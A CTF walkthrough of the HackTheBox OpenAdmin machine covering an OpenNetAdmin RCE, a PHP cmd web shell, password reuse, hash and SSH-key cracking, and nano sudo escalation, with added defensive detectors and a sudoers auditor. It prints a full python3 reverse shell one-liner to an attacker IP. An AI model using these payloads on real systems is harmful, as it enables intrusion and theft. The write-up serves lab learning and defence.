Hello everyone, in this post I will be sharing my writeup for the HTB OpenAdmin machine, an easy Linux box. The foothold involved enumerating the web server, finding OpenNetAdmin in use and seeing that it showed a version vulnerable to remote code execution. The shell we got from that couldn't be stabilized, but since we had permission to write in the folder being hosted on port 80 we could create a PHP file that executes a command passed as a GET parameter, and with that we can get a proper shell. After having a proper foothold, escalating to the first user was simple: a database was running, and the password for the database user, which we could read, was also valid for the first user. After becoming that user we can see we are in the internal group and can access a folder named internal in /var/www. Looking at the open ports on the machine, one port was hosting that folder, and from here it was just white-box testing: as we know the source code, we can get the output of the file by making a request to that port using curl. Becoming the root user was very trivial.
NMAP
nmap -p- -sC -sV --min-rate 5000 IP
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
| 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBcV0sVI0yWfjKsl7++B9FGfOVeWAIWZ4YGEMROPxxk4
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
PORT 80 (HTTP)
On the web server we only get the Apache default web page. I tried to see if it had something in robots.txt, but that file didn't exist. So I decided to run gobuster to fuzz for files and directories.
Going to the music directory we can see an HTML template page. There's a login link which takes us to an OpenNetAdmin page, an application for managing IP addresses, DNS, subnets, etc. It also exposes the version of OpenNetAdmin, which is 18.1.1.
On googling for exploits for version 18.1.1, we can see a GitHub repo having a PoC for remote code execution:
https://github.com/amriunix/ona-rce
We can check through the PoC whether the target is vulnerable or not, but when running the exploit it breaks. So I went to exploit-db and tried that exploit, and this one worked perfectly.
I tried getting a reverse shell again so that I could stabilize it, but it wasn't working. So I made a simple PHP file having a GET parameter named cmd which is executed through the system function, which runs shell commands and outputs the result. Then I hosted this file using python3 and downloaded it on the target machine using wget. Using a python3 reverse shell I was able to get a proper shell:

```
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.84",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
```

Here I have just stabilized the shell so that we can clear the terminal screen and use the bash history with the up and down arrow keys.
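From the defender's side, the two artifacts this step leaves behind are requests with a command-like query parameter in the Apache access log and a PHP file in a www-data-writable web root that feeds request input straight into an execution sink. The following is an added example, not code from the writeup: it runs both checks over constructed sample data (the log lines, the client IP reuse and the path /ona/shell.php are all made up, since the writeup does not name the uploaded file).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines (not taken from the box). The script
# name /ona/shell.php is a placeholder; the writeup does not name the file.
SAMPLE_LOG = """\
10.10.14.84 - - [05/Jan/2020:10:01:02 +0000] "GET /music/index.html HTTP/1.1" 200 2813 "-" "Mozilla/5.0"
10.10.14.84 - - [05/Jan/2020:10:01:09 +0000] "GET /ona/shell.php?cmd=id HTTP/1.1" 200 54 "-" "Wget/1.19.4"
10.10.14.84 - - [05/Jan/2020:10:01:15 +0000] "GET /ona/shell.php?cmd=python3%20-c%20%27import%20socket%27 HTTP/1.1" 200 0 "-" "curl/7.68.0"
"""

# Constructed file contents for the source scanner: the one-liner the
# writeup describes, and a harmless script that also reads $_GET.
SAMPLE_SHELL_PHP = "<?php system($_GET['cmd']); ?>"
SAMPLE_CLEAN_PHP = "<?php echo htmlspecialchars($_GET['q']); ?>"

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
CMD_PARAMS = {"cmd", "c", "exec", "command"}
# Command-execution sinks called directly on a request superglobal.
SINK_RE = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b"
)


def suspicious_requests(log_text):
    """Return (client ip, script path, parameter, decoded value) for every
    request to a .php script whose query string has a command-like parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if not parts.path.endswith(".php"):
            continue
        # parse_qs already percent-decodes, so %20/%27 come back as ' and space.
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            if name.lower() in CMD_PARAMS:
                hits.append((m["ip"], parts.path, name, values[0]))
    return hits


def webshell_indicators(php_source):
    """Return (sink, superglobal) pairs where request input reaches an exec sink."""
    return [(m.group(1), m.group(2)) for m in SINK_RE.finditer(php_source)]
```

Pointing `webshell_indicators` at every PHP file under a web root that www-data can write to is the cheap version of the check that would have caught this foothold; the log scan gives the timeline once a file is found.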
We can go into the /home directory to see how many users there are. There are 2 users, but we can't navigate into their folders as www-data doesn't have permission to view them. We can look for any cronjobs running with cat /etc/crontab. Nothing there; next we can look for open ports. Here we can see port 3306, which is for the database, so we can try to view the database password and see if it works on either one of the users.
In /opt/ona/www/local/config we can see a database settings file. Let's try this password on jimmy. Perfect, this worked! But sudo -l failed: the user was not allowed to use sudo. This user is in the internal group, so I guess there's some folder we can look into.
Looking into `index.php` we can see it's a login page which requires a username and password. There's a condition on providing the username `jimmy` or providing the correct password, which is stored as a SHA-512 hash that we can crack; it cracks to `Revealed`.
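The login check above, rebuilt in Python as an added example (not the box's index.php): the unsalted SHA-512 string comparison that falls to a wordlist in one hash per candidate, beside a salted, slow, constant-time replacement. The stored hash is constructed from the cracked value the page gives, and requiring both the username and the password to match is my assumption.

```python
import hashlib
import hmac
import os

# Constructed stand-in for the hash hard-coded in index.php: the writeup gives
# the cracked value ("Revealed"), not the hash itself.
STORED_SHA512 = hashlib.sha512(b"Revealed").hexdigest()


def weak_login(username, password):
    """The pattern the page describes: fixed username plus an unsalted,
    unkeyed SHA-512 of the password compared as a string (assumes both must match)."""
    return username == "jimmy" and hashlib.sha512(password.encode()).hexdigest() == STORED_SHA512


def recover_from_wordlist(stored_hex, wordlist):
    """Why the weak form offers no protection once the source leaks: with no salt
    and a fast hash, one SHA-512 per candidate word is all it takes."""
    for word in wordlist:
        if hashlib.sha512(word.encode()).hexdigest() == stored_hex:
            return word
    return None


# Hardened replacement: random per-record salt, slow KDF, constant-time compare.
ITERATIONS = 200_000


def make_record(password):
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + dk.hex()


def verify_record(record, password):
    salt_hex, dk_hex = record.split("$", 1)
    dk = hashlib.pbkdf2_hmac("sha512", password.encode(), bytes.fromhex(salt_hex), ITERATIONS)
    # compare_digest avoids leaking how many leading bytes matched via timing.
    return hmac.compare_digest(dk.hex(), dk_hex)
```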
We can also see a PHP file, main.php, which executes a shell command to read the id_rsa key of joanna. If we try to run the PHP file we get a permission denied error, as it's going to be executed as jimmy.
If we look at the listening ports on the machine we can see port 52846. Using curl we can make a request to that port, and it seems this is the same page that we saw in the internal directory, so this directory is being hosted on port 52846. This means we can navigate to the main.php file. I saved the output of the request to main.php in a text file and transferred that file to my machine.
On using the private key, it asks for a passphrase. Using ssh2john we can get a hash of id_rsa and crack it to get the passphrase.
Now we have escalated to the second user. On running sudo -l we can see we have permission to run nano on /opt/priv. We can check how to abuse nano on GTFOBins:
https://gtfobins.github.io/gtfobins/nano/
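The lesson of that last step is that restricting a sudo rule to one argument does nothing when the program itself can open other files or spawn a shell. As an added example (not part of the writeup), the following audits sudoers rules for that pattern; the sudoers fragment is constructed, since the page only says joanna may run nano on /opt/priv.

```python
import re
from os.path import basename

# Constructed /etc/sudoers fragment; only the joanna rule reflects the box.
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/data /mnt/backup
"""

# user  host=(runas) [TAG: ...] command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)
# Interactive programs that can read/write arbitrary files or run a shell from
# inside, so a path argument in the rule does not confine them.
SHELL_CAPABLE = {"nano", "pico", "vi", "vim", "less", "more", "man"}


def audit_sudoers(text):
    """Return (user, program, reason) for rules that grant unrestricted sudo or a
    shell-capable program; root's own rule is skipped."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            if cmd == "ALL":
                if m["user"] != "root":
                    findings.append((m["user"], "ALL", "unrestricted"))
                continue
            program = basename(cmd.split()[0])
            if program in SHELL_CAPABLE:
                findings.append((m["user"], program, "shell-capable program; argument restriction ineffective"))
    return findings
```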